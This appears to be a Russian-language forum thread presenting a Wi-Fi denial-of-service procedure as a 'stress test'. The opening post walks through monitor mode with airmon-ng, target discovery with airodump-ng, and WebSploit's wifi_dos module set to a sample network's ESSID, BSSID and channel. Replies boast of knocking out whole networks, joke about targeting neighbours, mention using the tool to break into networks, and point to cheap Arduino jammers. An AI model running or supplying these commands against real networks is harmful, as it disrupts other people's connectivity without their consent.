Подписывайтесь на наш Telegram и не пропускайте важные новости! Перейти

Стресс-тест беспроводной сети с Wifi_DoS

Пользователь
Пользователь
Статус
Оффлайн
Реакции
102
Как запустить Wifi_DoS

Смотрим имя беспроводного интерфейса и переводим беспроводную карту в режим монитора, чтобы собрать необходимые для DoS-атаки данные.​
Код:
Expand Collapse Copy
airmon-ng
airmon-ng start wlan0

Смотрим список доступных сетей и необходимые нам данные​
Код:
Expand Collapse Copy
airodump-ng wlan0mon

Запускаем WebSploit​
Код:
Expand Collapse Copy
cd ~ && websploit
Включаем модуль wifi_dos​
Код:
Expand Collapse Copy
use wifi/wifi_dos
Задаем необходимые данные​
Код:
Expand Collapse Copy
wsf:Wifi_Dos > set essid Mial
wsf:Wifi_Dos > set bssid 20:25:64:16:58:8C
wsf:Wifi_Dos > set channel 11
Здесь советую прочитать рекомендацию ниже​
Код:
Expand Collapse Copy
wsf:Wifi_Dos > set interface wlan0
wsf:Wifi_Jammer > set mon wlan0mon

Здесь могут быть варианты. interfacewlan0 или что-то другое, что у вас отображается по команде airmon-ng.
Значение mon всегда wlan0mon — здесь без вариантов.
Запускаем командой​
Код:
Expand Collapse Copy
wsf:Wifi_Jammer > run

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Что это?

Добавлю две вещи - для мониторинга сетей нужен внешний WIFI адаптер, и wifijammer и wifidos по умолчанию установлены только в BlackArch - в остальных же дистрибутах нужно докачивать.

Стресс тест, заходишь в мак врубаешь это - ложишь всю сеть

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Добавлю две вещи - для мониторинга сетей нужен внешний WIFI адаптер, и wifijammer и wifidos по умолчанию установлены только в BlackArch - в остальных же дистрибутах нужно докачивать.

Ахаахааххахахаха,надо сделать так,а то соседи со всем уже ахуели

Легче отдать 3$ за Ардуино и закинуть туда прошивку,а так это утелиту можно еще использовать для взлома сетей

Косяк с моей стороны. Я об этом не упомянул.

Легче отдать 3$ за Ардуино и закинуть туда прошивку,а так это утелиту можно еще использовать для взлома сетей
Может модуль Арудино? А то я бы посмотрел где ты найдешь весь Арудино за 3$. Да и для модуля антенна нужна норм, а это хотябы ещё 10$

Может модуль Арудино? А то я бы посмотрел где ты найдешь весь Арудино за 3$. Да и для модуля антенна нужна норм, а это хотябы ещё 10$
посмотри видосы овера там есть видио глушилка за 3 доллара

Назад
Сверху Снизу